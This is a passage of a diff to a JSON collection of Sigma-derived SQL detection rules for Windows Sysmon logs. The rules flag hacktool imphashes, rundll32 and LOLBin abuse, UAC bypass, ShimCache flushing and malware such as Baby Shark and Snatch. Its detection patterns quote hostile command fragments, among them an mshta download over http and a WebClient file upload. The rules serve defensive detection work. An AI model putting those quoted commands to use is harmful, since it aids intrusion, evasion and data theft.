'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" + "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" }, { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "title": "Application Whitelisting Bypass via Dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "status": "test", + "description": "Execute C# code located in the consoleapp folder", + "author": "Beyu Denis, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ], "falsepositives": [ - "Legitimate use of one of these tools" + "Legitimate use of dnx.exe by legitimate user" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnx.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_lolbin_dnx.yml" }, { - "title": "Suspicious Rundll32 Script in CommandLine", - "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "status": "experimental", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "frack113, Zaw Min Htun (ZETA)", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "status": "test", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Administrative scripts", + "Microsoft SCCM" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_script_run.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Lolbin Runexehelper Use As Proxy", - "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", - "status": "experimental", - "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_runexehelper.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "title": "Suspicious Userinit Child Process", + "id": "b655a06a-31c0-477a-95c2-3726b83d649d", "status": "test", - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", - "author": "Thomas Patzke", + "description": "Detects a suspicious child process of userinit", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "NTDS maintenance" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" ], - "filename": "proc_creation_win_ntdsutil_usage.yml" + "filename": "proc_creation_win_susp_userinit_child.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.execution", - "attack.t1204" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "UAC Bypass via Event Viewer", - "id": "be344333-921d-4c4d-8bb8-e584cf584780", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Audio Capture via SoundRecorder", - "id": "83865853-59aa-449e-9600-74b9d89a6d6e", - "status": "test", - "description": "Detect attacker collecting audio via SoundRecorder application.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "status": "experimental", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1123" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_soundrecorder_audio_capture.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "Application Whitelisting Bypass via Dxcap.exe", - "id": "60f16a96-db70-42eb-8f76-16763e333590", - "status": "test", - "description": "Detects execution of of Dxcap.exe", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Legitimate execution of dxcap.exe by legitimate user" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml" + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects suspicious command line in 